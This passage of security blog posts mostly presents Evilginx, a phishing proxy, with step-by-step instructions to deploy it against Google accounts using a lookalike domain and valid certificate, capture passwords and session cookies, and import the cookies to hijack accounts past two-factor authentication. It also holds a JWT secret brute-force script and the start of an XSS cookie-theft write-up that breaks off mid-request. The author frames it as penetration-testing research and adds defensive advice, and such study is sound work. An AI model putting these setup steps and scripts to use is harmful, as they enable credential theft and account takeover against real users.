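rc = encode_redirect('https://www.youtube.com/watch?v=dQw4w9WgXcQ')
print(rc)                   # aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
print(decode_redirect(rc))  # https://www.youtube.com/watch?v=dQw4w9WgXcQ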

Every minute, Evilginx will parse the logs. If anyone got phished and performed a successful login, their login credentials with session cookies will be saved in the logs directory under the Evilginx root directory.

Session cookies can be imported using the EditThisCookie extension for Chrome. If you want to see the whole process, you may want to watch a slightly outdated demonstration video of Evilginx (everything is up-to-date except for the shell commands):

Epilogue

I hope this update puts Evilginx on its path to greatness! From now on, I want to focus on adding support for more popular websites. If you happen to succeed in creating your own templates for Evilginx and you want to share, please contact me and I may put your template into official Evilginx repository.

I am constantly looking for interesting projects to work on!

Do not hesitate to contact me if you happen to be working on projects that require:

  • Reverse Engineering
  • Development of Security Software
  • Web / Mobile Application Penetration Testing
  • Offensive Tools for Red Team Assessments

If you have any feedback or suggestions, contact me via the comment section, via Twitter @mrgretzky or directly via e-mail at [email protected].

Evilginx GitHub Repository

https://github.com/kgretzky/evilginx

Follow me on Twitter if you want to stay up to date.

Stay tuned for more updates and other posts!

Evilginx - Advanced Phishing with Two-factor Authentication Bypass

6 April 2017 at 04:21
Evilginx - Advanced Phishing with Two-factor Authentication Bypass

Welcome to my new post! Over the past several months I've been researching new phishing techniques that could be used in penetration testing assignments. Almost every assignment starts with grabbing the low-hanging fruit, which are often employees' credentials obtained via phishing.

In today's post I'm going to show you how to make your phishing campaigns look and feel the best way possible.

I'm releasing my latest Evilginx project, which is a man-in-the-middle attack framework for remotely capturing credentials and session cookies of any web service. It uses the Nginx HTTP server to proxy the legitimate login page to visitors and captures credentials and session cookies on-the-fly. It works remotely, uses a custom domain and a valid SSL certificate. I have decided to phish Google services for the Evilginx demonstration, as there is no better way to assess this tool's effectiveness than stress-testing the best anti-phishing protections available.

Please note that Evilginx can be adapted to work with any website, not only with Google.

Enjoy the video. If you want to learn more on how this attack works and how you can implement it yourself, do read on.

Disclaimer: This project is released for educational purposes and should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.

How it works
  1. Attacker generates a phishing link pointing to his server running Evilginx: https://accounts.notreallygoogle.com/ServiceLogin?rc=https://www.youtube.com/watch?v=dQw4w9WgXcQ&rt=LSID
    Parameters in the URL stand for:
    rc = On successful sign-in, the victim will be redirected to this link, e.g. a document hosted on Google Drive.
    rt = This is the name of the session cookie which is set in the browser only after a successful sign-in. If this cookie is detected, it is an indication for Evilginx that the sign-in was successful and that the victim can be redirected to the URL supplied by the rc parameter (a small sketch of this detection follows the list).
  2. Victim receives the attacker's phishing link via any available communication channel (email, messenger etc.).
  3. Victim clicks the link and is presented with Evilginx's proxied Google sign-in page.
  4. Victim enters his/her valid account credentials, progresses through the two-factor authentication challenge (if enabled) and is redirected to the URL specified by the rc parameter. At this point the rd cookie is saved for the notreallygoogle.com domain in the victim's browser. From now on, if this cookie is present, he/she will be immediately redirected to the rc URL when the phishing link is re-opened.
  5. Attacker now has the victim's email and password, as well as session cookies that can be imported into the attacker's browser in order to take full control of the logged-in session, bypassing any two-factor authentication protections enabled on the victim's account.
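
A minimal sketch of that rt cookie detection in Python - names and header formats are simplified stand-ins for what the Nginx/LUA setup actually does:

def signin_successful(set_cookie_headers, rt_name):
    # the rt session cookie appearing in the upstream set-cookie headers
    # indicates that the victim signed in successfully
    for header in set_cookie_headers:
        if header.split('=', 1)[0].strip() == rt_name:
            return True
    return False

print(signin_successful(['LSID=abc123; Path=/; Secure', 'NID=xyz; Path=/'], 'LSID'))  # True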

Let's take a few steps back and try to define the main obstacles in traditional phishing efforts.

The first and major pain of phishing for credentials is two-factor authentication. You can create the best looking template that yields you dozens of logins and passwords, but you will eventually get roadblocked when asked for a verification token that arrived via SMS. Not only will it stop you from progressing further, but it will also tip off the account owner when they receive a login attempt alert.

The second issue with phishing templates is that they must accept any login and password, as they have no means of confirming their validity. That will, at times, leave you with invalid credentials.

The third issue is having to create the phishing templates themselves. I don't know about you, but for me the process of copying the site layout, stripping JavaScript, fixing CSS and writing my own replacements for the stripped JavaScript code, to make the login screen behave like the original, is extremely annoying. It feels bad to recreate something which has already been done.

In the past several months I have worked on my own ettercap-like HTTP proxy software written in C++, using the Boost::Asio library for maximum efficiency. I implemented SSLstrip, DNS spoofing and HSTS bypass. This solution worked perfectly in the Local Area Network, but I wondered if the same ideas could be repurposed for remote phishing, without the need for custom-made software.

I had a revelation when I read an excellent blog post by @i_bo0om. He used Nginx HTTP server's proxy_pass feature and sub_filter module to proxy the real Telegram login page to visitors, intercepting credentials and session cookies on-the-fly using man-in-the-middle attacks. This article made me realize that Nginx could be used as a proxy for external servers and it sparked the idea of Evilginx. The idea was perfect - simple and yet effective.

Allow me to talk a bit about Evilginx's research process, before I focus on installation and usage.

Evilginx Research

The core of Evilginx is the usage of Nginx's HTTP proxy module. It allows passing clients' requests to another server. This basically allows the Nginx server to act as a man-in-the-middle agent, effectively intercepting all requests from clients, modifying and forwarding them to the other server. Later, it intercepts the server's responses, modifies them and forwards them back to clients. This setup allows Evilginx to capture credentials sent in POST request packets and, upon successful sign-in, capture valid session cookies sent back from the proxied server.

In order to prevent the visitor from being redirected to the real website, all URLs with the real website's domain, retrieved from the server, need to be replaced with the Evilginx phishing domain. This is handled by the sub_filter module provided by Nginx.

Nginx implements its own logging mechanism, which will log every request in detail, including the POST body and also the cookie: and set-cookie: headers. I created a Python script named evilginx_parser.py, which will parse the Nginx log, extract credentials and session cookies, then save them in corresponding directories, for easy management.

There is one big issue in Nginx's logging mechanism that almost prevented Evilginx from being finished.

Take a look at the following Nginx configuration line that specifies the format in which log entries should be created:

log_format foo '$remote_addr "$request" set_cookie=$sent_http_set_cookie';

Variable $sent_http_set_cookie stores a value of set-cookie response header. These headers will contain session cookies returned from the server on successful authorization and they have to be included in the output of Nginx's access log.
The issue is, HTTP servers return cookies in multiple set-cookie headers, like so:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=this_is_the_first_cookie; path=/; secure; HttpOnly
Set-Cookie: APPID=this_is_the_second_cookie; path=/;
Set-Cookie: NSAL33TTRACKER=this_is_the_third_cookie; path=/;
Server: nginx
Connection: close

For some reason Nginx's $sent_http_set_cookie variable doesn't store set-cookie header values as an array. Instead it stores only the value of the first seen set-cookie header, which in our example would be JSESSIONID=this_is_the_first_cookie; path=/; secure; HttpOnly. This is a huge problem, as it allows logging only one cookie, forgetting the rest. While searching the internet for possible solutions, I came across posts from 2011 about the same issue, reported by hopeless sysadmins and developers. I was positive that Nginx itself did not have any workaround.

I had two options:

  1. Modifying Nginx source code and fixing the issue myself.
  2. Developing a custom Nginx module that would allow for better packet parsing.

After a while, I knew neither of the two options was viable. They would have required me to spend a huge amount of time understanding the internals of Nginx. I neither wanted to do that, nor had that amount of time to spend on a side project.

Thankfully, I came across some interesting posts about using the LUA scripting language in Nginx configuration files. I learned that this was the OpenResty Nginx modification, which allows putting small scripts into site configuration files to handle packet parsing and data output.

OpenResty website describes itself as such:

OpenRestyยฎ is a full-fledged web platform that integrates the standard Nginx core, LuaJIT, many carefully written Lua libraries, lots of high quality 3rd-party Nginx modules, and most of their external dependencies. It is designed to help developers easily build scalable web applications, web services, and dynamic web gateways.

I found out that by using LUA scripting, it was possible to access set-cookie headers as an array.

Here is an example function that returns all set-cookie header values as an array:

function get_cookies()
	-- ngx.header.set_cookie holds a string for a single set-cookie
	-- header and a table when there are multiple of them
	local cookies = ngx.header.set_cookie or {}
	if type(cookies) == "string" then
		cookies = {cookies}
	end
	return cookies
end

The big issue with logging cookies was resolved, and the best part was that LUA scripting allowed much more in terms of packet modification than vanilla Nginx, e.g. modification of response packet headers.

The rest of the development followed swiftly. I will explain the more interesting aspects of the tool as I go, while I guide you through installing and setting up everything from scratch.

Getting Your Hands Dirty

[UPDATE 2017-04-26] I've released a new version of Evilginx, which makes the installation process described in this post slightly out-of-date. For new installation instructions, refer to the latest post about the Evilginx 1.0 Update.

First of all, we need a server to host Evilginx. I've used a Debian 8.7 x64 512MB RAM VPS hosted on Digital Ocean. If you use this link and create an account, you will get a free $10 to spend on your servers. I've used the cheapest $5/mo server, so it should give you 2 months extra, and seriously, Digital Ocean is the best hosting company I've ever used.

Once our server is up and running, we need to log into it and perform upgrades, just in case:

apt-get update
apt-get upgrade

We will also need a domain that will point to our VPS. I highly recommend buying one from NameCheap (yes, this is my affiliate link, thanks!). They have never let me down and support is top notch.

I won't cover here how to set up your newly bought domain to point at your newly bought VPS. You can find excellent tutorials on Digital Ocean:

  1. How to Point to DigitalOcean Nameservers From Common Domain Registrars
  2. How To Set Up a Host Name with DigitalOcean

For the remainder of this post, let's assume that our registered domain is: notreallygoogle.com.

Installing OpenResty/Nginx

Now we can proceed to install OpenResty. We will be installing it from source. At the time of writing, the most current version was 1.11.2.2; if you want a newer version, you can check the download page for more up-to-date links.

mkdir dev
cd dev
wget https://openresty.org/download/openresty-1.11.2.2.tar.gz
tar zxvf openresty-1.11.2.2.tar.gz
cd openresty-1.11.2.2

With OpenResty unpacked, we need to install our compiler and dependency packages to compile it. The following will install Make, GCC compiler, PCRE and OpenSSL development libraries:

apt-get -y install make gcc libpcre3-dev libssl-dev

Before we compile the sources, we need to configure the installation. The following line will do the job of putting the Nginx binaries, logs and config files into the proper directories. It will also enable the sub_filter module and LuaJIT functionality.

./configure --user=www-data --group=www-data --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --with-http_ssl_module --with-pcre --with-http_sub_module --with-luajit

At this point, we are ready to compile and install.

make
make install

If all went well, we can verify that OpenResty was installed properly:

root@phish:~# nginx -v
nginx version: openresty/1.11.2.2

From now on, I will refer to OpenResty as Nginx. I believe it will make it less confusing.

Setting up the daemon

Nginx is now installed, but it currently won't start at boot or keep running in the background. We need to create our own systemd daemon service rules:

cat <<'EOF' > /etc/systemd/system/nginx.service
[Unit]
Description=The NGINX HTTP and reverse proxy server
After=syslog.target network.target remote-fs.target nss-lookup.target

[Service]
Type=forking
PIDFile=/run/nginx.pid
ExecStartPre=/usr/sbin/nginx -t
ExecStart=/usr/sbin/nginx
ExecReload=/bin/kill -s HUP $MAINPID
ExecStop=/bin/kill -s QUIT $MAINPID
PrivateTmp=true

[Install]
WantedBy=multi-user.target
EOF

Before we launch our service for the first time, we have to properly configure Nginx.

Nginx configuration

We need to open the Nginx configuration file /etc/nginx/nginx.conf with any text editor and make sure to add include /etc/nginx/sites-enabled/*; in the http {...} block. After modification, it should look something like this:

...
http {
    include       mime.types;
    default_type  application/octet-stream;

    include /etc/nginx/sites-enabled/*;
    ...
}

Nginx, from now on, will look for our site configurations in the /etc/nginx/sites-enabled/ directory, where we will be putting symbolic links to files residing in the /etc/nginx/sites-available/ directory. Let's create both directories:

mkdir /etc/nginx/sites-available/ /etc/nginx/sites-enabled/

We need to set up our phishing site configuration for Nginx. We will use the site configuration for phishing Google users that is included with the Evilginx package. The easiest way to stay up-to-date is to clone the Evilginx GitHub repository.

apt-get -y install git
cd ~
mkdir tools
cd tools
git clone https://github.com/kgretzky/evilginx
cd evilginx

Now copy Evilginx's site configuration template to the /etc/nginx/sites-available/ directory. We will also replace all occurrences of {{PHISH_DOMAIN}} in the template file with the name of the domain we registered, which in our case is notreallygoogle.com. When that's done, create a symbolic link to our new site configuration file in the /etc/nginx/sites-enabled/ directory:

cp ./sites/evilginx-google-template.conf /etc/nginx/sites-available/evilginx-google.conf
sed -i 's/{{PHISH_DOMAIN}}/notreallygoogle.com/g' /etc/nginx/sites-available/evilginx-google.conf
ln -s /etc/nginx/sites-available/evilginx-google.conf /etc/nginx/sites-enabled/

We are almost ready. The one remaining step is to install our SSL/TLS certificate to make the Evilginx phishing site look legitimate and secure. We will use a free LetsEncrypt SSL/TLS certificate for this purpose.

Installing SSL/TLS certificates

EFF has released an incredibly easy to use tool for obtaining valid SSL/TLS certificates from LetsEncrypt. It's called Certbot and we will use it right now.

Open your /etc/apt/sources.list file and add the following line:

deb http://ftp.debian.org/debian jessie-backports main

Now install Certbot:

apt-get update
apt-get install certbot -t jessie-backports

If all went well, we should be able to obtain our certificates now. Make sure Nginx is not running, as Certbot will need to open HTTP ports for LetsEncrypt to verify ownership of our server. Enter the following command and proceed through the prompts:

certbot certonly --standalone -d notreallygoogle.com -d accounts.notreallygoogle.com

On success, our private key and public certificate chain should find their place in the /etc/letsencrypt/live/notreallygoogle.com/ directory. Evilginx's site configuration already includes a setting to use SSL/TLS certificates from this directory.

Please note that LetsEncrypt certificates are valid for 90 days, so if you plan to use your server for more than 3 months, you can add the certbot renew command to your /etc/crontab and have it run every day. This will make sure your SSL/TLS certificate is renewed whenever it's bound to expire in 30 days or less.

Starting up

Everything is ready for launch. Make sure your Nginx daemon is enabled and start it:

systemctl enable nginx
systemctl start nginx

Check if Nginx started properly with systemctl status nginx and make sure that both ports 80 and 443 are now opened by the Nginx process, by checking output of netstat -tunalp.

If anything went wrong, try to retrace your steps and see if you did everything properly. Do not hesitate to report issues in the comments section below or even better, file an issue on GitHub.

In order to create your phishing URL, you need to supply two parameters:

  1. rc = On successful sign-in, the victim will be redirected to this link, e.g. a document hosted on Google Drive.
  2. rt = This is the name of the session cookie which is set in the browser only after a successful sign-in. If this cookie is detected, it is an indication for Evilginx that the sign-in was successful and that the victim can be redirected to the URL supplied by the rc parameter.

Let's say we want to redirect the phished victim to a rickroll video on YouTube and we know for sure that Google's session cookie name is LSID. The URL should look like this:

https://accounts.notreallygoogle.com/ServiceLogin?rc=https://www.youtube.com/watch?v=dQw4w9WgXcQ&rt=LSID

Try it out and see if it works for your own account.

Capturing credentials and session cookies

Nginx's site configuration is set up to output data into the /var/log/evilginx-google.log file. This file will store all relevant parts of the requests and responses that pass through Nginx's proxy. The log contents are hard to analyze, but we can automate their parsing.

I wrote a small Python script, called evilginx_parser.py, which will parse Nginx's log files and extract only credentials and session cookies from them. Those will be saved in separate files in directories named after extracted accounts' usernames.

I assume you've now tested your Evilginx setup by phishing your own account's session. Let's try to extract your captured data. Here is the script's usage page:

# ./evilginx_parser.py -h
usage: evilginx_parser.py [-h] -i INPUT -o OUTDIR -c CREDS [-x]

optional arguments:
  -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        Input log file to parse.
  -o OUTDIR, --outdir OUTDIR
                        Directory where output files will be saved.
  -c CREDS, --creds CREDS
                        Credentials configuration file.
  -x, --truncate        Truncate log file after parsing.

All arguments should be self-explanatory, except maybe --creds and --truncate. The --creds argument specifies the input config file, which tells the script what kind of data we want to extract from the log file.

The creds config file google.creds, made for Google, looks like this:

[creds]
email_arg=Email
passwd_arg=Passwd
tokens=[{"domain":".google.com","cookies":["SID", "HSID", "SSID", "APISID", "SAPISID", "NID"]},{"domain":"accounts.google.com","cookies":["GAPS", "LSID"]}]

The creds file provides information on the sign-in form's username and password parameter names. It also specifies a list of cookie names that manage the user's session, with assigned domain names. These will be intercepted and captured.

It is very easy to create your own .creds config files if you decide to implement phishing of other services for Evilginx.
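
Since the format is a standard INI file with a JSON list inside, a minimal parsing sketch in Python could look like this (assuming the google.creds file shown above):

import configparser
import json

config = configparser.ConfigParser()
config.read('google.creds')

creds = config['creds']
print(creds['email_arg'])   # Email
print(creds['passwd_arg'])  # Passwd
for token in json.loads(creds['tokens']):
    print(token['domain'], token['cookies'])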

If you supply the -x/--truncate argument, the script will truncate the log file after parsing it. This is useful if you want to automate the execution of the parser to run every minute, using cron.

Example usage of the script:

# ./evilginx_parser.py -i /var/log/evilginx-google.log -o ./logs -c google.creds -x

That should put the extracted credentials and cookies into the ./logs directory. Accounts are organized into separate directories, in which you will find files containing login attempts and session cookies.

Session cookies are saved in JSON format, which is fully compatible with the EditThisCookie extension for Chrome. Just pick the Import option in the extension's window and copy-paste the JSON data into it, to impersonate the captured session.
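
For reference, such an export is just a JSON array of cookie objects; here is a Python sketch that builds one entry (the field names are approximate and the values are made up):

import json
import time

cookie = {
    'domain': '.google.com',
    'name': 'SID',
    'value': 'AbCdEf123456',  # the captured session token value
    'path': '/',
    'secure': True,
    'httpOnly': True,
    # +2 years, as described in the FAQ below
    'expirationDate': time.time() + 2 * 365 * 24 * 3600,
}
print(json.dumps([cookie], indent=2))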

Keep in mind that it is often best to clear all cookies from your browser before importing.

After you've imported the intercepted session cookies, open Gmail for example and you should be on the inside of the captured account.

Congratulations!

Session Hijacking FAQ

I figured many of you may not be familiar with the method of hijacking session tokens. I'd like to shed some light on the subject by answering some questions I often get.

Does session hijacking allow taking full control of the account, without the need to even know the user's account password?

Yes. When you import another account's session cookies into your browser, the server has no other option than to trust that you are indeed the person who logged into their own account.

How is this possible? Shouldn't there be protections to prevent this?

The only variable which is hard to control for the attacker is the source IP address. Most web services handling critical data should not allow the same session token to be used from multiple IP addresses at the same time (e.g. banks). It would be wise to detect such a scenario and then invalidate the session token, requiring both parties to log in again. As far as I've tested, Google doesn't care about the IP address of the account that uses a valid session token. The attacker's IP can be from a different continent and still it wouldn't raise red flags for the legitimate account owner.

I believe the only reason why Google allows simultaneous access to accounts from different IPs, using the same session token, is user experience. Imagine how many users switch their IPs while they have constant access to their Google services. They have Google signed in on their phone and PC; they move between the coffee shop, work and home, where they use different wireless networks, VPNs or 3G/4G networks.

If Google were to invalidate session tokens every time an IP change was detected, it would make using their services a nightmare and people would switch to easier-to-use alternatives.

And, no, Google Chrome does not perform any OS fingerprinting to verify the legitimate owner's machine. It would be useless, as it would provide less protection for people using other browsers (Firefox, Safari, Opera), and even if they did fingerprint the OS, the telemetry information would have to be somehow sent to the server during the user's sign-in. This, inevitably, would also allow hijacking.

Does the account owner get any alerts when he tries to log into Google through the Evilginx phishing site?

Yes. On successful login, the account owner will receive a push notification on his Android phone (registered with the same Google account) and an e-mail to his address, with information that someone logged into their account from an unknown IP address. The IP address will be the one of the Evilginx server, as it is the one acting as a man-in-the-middle proxy and all requests to the Google server originate from it.

The attacker can easily delete the "Unknown sign-in alert" e-mail after getting access to the account, but there will be no way for him to remove the push notification, sent to owner's Android phone.

The issue is, some people may ignore the alert, which will be sent right after they personally sign in at the Evilginx phishing site. They may take the alert for a false positive, as they did sign in a minute earlier.

How would this attack fare against hardware two-factor authentication solutions?

Edit (2017/04/07):
Apparently U2F "security key" solutions check the domain you're logging into when the two-factor token is generated. In such a scenario the attack won't work, as the user won't be able to log in, because of the phishing domain being present instead of the legitimate one.

Thanks to kind readers who reported this!

Two-factor authentication protects the user only during the sign-in process. If the user's password is stolen, 2FA acts as a backup security protection, using an additional communication channel that is less likely for an attacker to compromise (personal phone, backup e-mail account, hardware PIN generators).

On successful login, using any form of two-factor authentication, the server has to save session cookies in the account owner's browser. These will be required by the server to verify the account owner on every subsequent request.

At this point, if the attacker is in possession of the session cookies, the 2FA method does not matter, as the account has already been compromised, since the user successfully logged in.

What will happen if I don't tick the "Remember me" checkbox on the Evilginx phishing page, which should make the session token temporary?

A temporary session token will be sent to the user's browser as a cookie with no expiration date. This lets the browser know to remove this cookie from its cache when the browser is closed. Evilginx will still capture the temporary session token and, during extraction, it will add its own expiration date of +2 years, making it permanent this time.

If the server doesn't have any mechanism to invalidate temporary session tokens after a period of time, the tokens it issued may be used by an attacker for a long time, even after the account owner closes their browser.

What can I do if my session token gets stolen? How do I prevent the attacker from accessing my account?

At this point, the best thing you can do is change your password. Mature services like Google will effectively invalidate all active session tokens in use with your account. Additionally, your password will change and the attacker won't be able to use it to log back in.

Google also provides a feature to see the list of all your active sessions, where you can invalidate them as well.

How do I not get phished like this?

Do NOT only check if the website you are logging in to has HTTPS with a secure lock icon in the address bar. That only means that the data between you and the server is encrypted, but it won't matter if the "benevolent" attacker also secures the data transport between you and his server.

Most important is to check the domain in the address bar. If the address of the sign-in page looks like this: https://accounts.mirrorgoogle.com/ServiceLogin?blahblah, put the domain name mirrorgoogle.com directly into Google search. If nothing legitimate comes up, you can be sure that you are being phished.

Conclusion

I need to stress that Evilginx is not exploiting any vulnerability. Google still does a terrific job at protecting its users from this kind of threat. Because Evilginx acts as a proxy between the user and Google's servers, Google will recognize the proxy server's IP as the client's and not the user's real IP address. As a result, the user will still receive an alert that his account was accessed from an unknown IP (especially if the Evilginx server is hosted in a different country than the one the phished user resides in).

I released this tool as a demonstration of how far attackers can go in the hunt for your accounts and private data. If one were to fall for such a ploy, not even two-factor authentication would help.

If you are a penetration tester, feel free to use this tool in testing security and threat awareness of your clients.

In the future, if the feedback is good, I plan to write a post going into the details of how to create your own Evilginx configuration files, in order to add support for phishing any website you want.

I am constantly looking for interesting projects to work on!

Do not hesitate to contact me if you happen to be working on projects that require:

  • Reverse Engineering
  • Development of Security Software
  • Web / Mobile Application Penetration Testing
  • Offensive Tools for Red Team Assessments

I am extremely passionate about what I do and I like to work with people smarter than I am.

As always, if you have any suggestions, ideas or you just want to say "Hi", hit me up on Twitter @mrgretzky or directly via e-mail at [email protected].

You can find Evilginx project on GitHub here:
Evilginx on GitHub

Till next time!

Sniping Insecure Cookies with XSS

22 March 2017 at 06:07
Sniping Insecure Cookies with XSS

In this post I want to talk about improper implementation of session tokens and how a single XSS vulnerability can result in full compromise of a web application. The following analysis is based on an existing real-life web application. I cover the step-by-step process that led to an administrator's account takeover and I share my thoughts on what could have been done to better secure the application.

Recently, I performed a penetration test of a web application developed by the accounting company that handles my accounting. I figured that my own financial data is only as secure as the application itself, so I decided to poke around and see what flaws I could find.

The accounting application that I will be talking about allows checking unpaid invoices, shows urgent messages from the accounting staff and keeps the user up to date on how much needs to be paid to various financial institutions.

One of the first things I do when starting a new web penetration test is finding out how session tokens are generated and handled. This often gives me quick insight into what I may be up against.

Meet the Token

As I found out, the application relies heavily on providing functionality via a REST API and the site content is generated dynamically using AngularJS with asynchronous requests.

I started by signing into my account. The sign-in packet sent to the REST backend looked as follows:

POST /tokens HTTP/1.1
Host: app.accounting.com:10443
Connection: close
Content-Length: 64
Accept: application/json, text/plain, */*
Origin: https://app.accounting.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: application/json
Referer: https://app.accounting.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8

{"email":"[email protected]","password":"super_secret_passwd"}

The response to my sign-in attempt with valid credentials looked like this:

HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Wed, 15 Mar 2017 11:23:23 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 356
Connection: close
Vary: Accept-Encoding
Request-Time: 121
Access-Control-Allow-Origin: *

{"value":"eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg","account":{"id":77,"email":"[email protected]","status":"ACTIVE","role":"CLIENT_ADMIN","firstName":"John","lastName":"Doe","creationDate":"2016-01-22T18:14:23+0000"},"expirationDate":"2017-03-16T11:23:23+0000"}

The server replied with what looked like a session token and information about my account. The whole JSON reply, as I found out, was later saved into a globals cookie, presumably to be accessible by the AngularJS client-side scripts. I learned that the globals cookie was saved without the secure or http-only flags set.

Without the http-only flag, the cookie is accessible from JavaScript running under the same domain, which I assumed was intended behaviour, as the client-side scripts could retrieve its data to populate website contents and use the session token with AJAX requests to the REST backend. For cookies without the http-only flag set, it often ends badly once a single XSS vulnerability is discovered.

The lack of a secure flag on the cookie allows for its theft via a man-in-the-middle attack. The attacker can just inject <img src="http://app.accounting.com/"> into browsed HTTP traffic and intercept the HTTP request, including the session token cookie, which will be sent over the unencrypted HTTP channel. It also doesn't help that the application doesn't have HTTP Strict Transport Security enabled in its response headers.

Let's focus on the session token itself, which reads:

eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg

During a web application penetration test I often sign out and sign in multiple times to see if the newly generated session token, provided by the server, differs much from the previous one. In this case, it was apparent the token was in the JSON Web Token format.

In short, a JSON Web Token aka JWT is a combination of user data and a hash-based signature. The signature prevents anyone who doesn't know the secret key, used in the signing process, from crafting their own tokens. The token is divided into three sections and each is encoded with base64.

Dissecting this application's token we get:

JWT format: <signing_algo_header>.<user_data>.<signature>
JWT: eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg  

atob('eyJhbGciOiJIUzI1NiJ9') => '{"alg":"HS256"}'
atob('eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30') => '{"tokenType":"AUTHORIZE","exp":1489663403,"id":77}'
atob('5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg') => <signature_hash_binary_data_HMAC_SHA256_user_data>

The server will re-calculate the signature hash of user_data with the secret key only known to the server. If the re-calculated hash differs from the one supplied with the token, it will not be accepted.

We can see that the token contains a timestamp of when it is supposed to expire (in this scenario tokens were valid for one day) and the ID of the user who should be authorized. It is evident that if we were able to change the id value inside the token, we could be authorized as any registered user of the application. The issue is, we would have to re-calculate the signature hash using the secret key we don't know.

It is possible to brute-force the secret key using an offline dictionary attack and a powerful PC, but if the secret key is longer than 12 characters and also uses special characters, this will be a waste of time and, more importantly, a waste of CPU or GPU cycles.
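
To illustrate how cheap such an offline attack is to mount, here is a minimal Python sketch that tests candidate secret keys against the captured token (the wordlist.txt dictionary file is an assumption):

import base64
import hashlib
import hmac

token = ('eyJhbGciOiJIUzI1NiJ9.'
         'eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.'
         '5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg')

# HS256 signs the ASCII string "<header>.<payload>"
signed_part, _, signature_b64 = token.rpartition('.')
# JWT uses unpadded base64url, so restore the padding before decoding
signature = base64.urlsafe_b64decode(signature_b64 + '=' * (-len(signature_b64) % 4))

with open('wordlist.txt', 'rb') as wordlist:  # hypothetical dictionary file
    for line in wordlist:
        candidate = line.strip()
        digest = hmac.new(candidate, signed_part.encode(), hashlib.sha256).digest()
        if hmac.compare_digest(digest, signature):
            print('Secret key found:', candidate.decode())
            break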

There have already been many articles written on why using JWT is bad, so I'll try to keep my list short and stick to two major flaws:

  1. Possibility of cracking the secret key. If the attacker has the resources, time and enough motivation, the secret key can be cracked.
  2. No way to invalidate the tokens. Every application that allows users to manage their accounts should invalidate and re-create the session token every time the user signs in, signs out or resets his/her password. This makes sure that any attacker who managed to intercept the user's session token will not be able to use it anymore; the attacker immediately loses access to the hijacked account. This cannot be done with JWT, as the server will only start rejecting the session token after the "exp":1489663403 timestamp is hit.

Let's leave aside the fact that the application is using JWT as a session token and focus on the implications of making the session token accessible from JavaScript.

A sample request to the REST backend that includes the session token looks as follows:

GET /messages/page/1?cacheTime=1489429271483&messagePageType=LATEST&pageSize=10&read=false HTTP/1.1
Host: app.accounting.com:10443
Connection: close
Accept: application/json, text/plain, */*
X-AUTH-TOKEN: eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Origin: https://app.accounting.com
Referer: https://app.accounting.com/
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

As we can see, the session token is sent in a custom HTTP header, X-AUTH-TOKEN. Sending session tokens in custom HTTP headers protects applications from Cross-Site Request Forgery (CSRF) attacks. Unfortunately, the fact that the globals cookie storing the token must be available from JavaScript, in order to be included with a request, makes the application exceptionally vulnerable to token theft. All the attacker needs is one XSS vulnerability in the application to capture the token cookie with injected JavaScript code.

With that in mind, I proceeded to look for vulnerabilities that would allow me to inject JavaScript code.

One XSS to Rule Them All

I found a messaging feature in the application that immediately caught my attention. Basically, it allowed any user to send a message to the application's administrators and initiate a conversation. If vulnerable, it would make the perfect channel to send a stored XSS payload straight to the site administrators.

I put in a blank message with one carriage return character, clicked Send and looked at the request:

PUT /messages HTTP/1.1
Host: app.accounting.com:10443
Connection: close
Content-Length: 1242
Accept: application/json, text/plain, */*
X-AUTH-TOKEN: eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Origin: https://app.accounting.com
Content-Type: application/json
Referer: https://app.accounting.com/
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

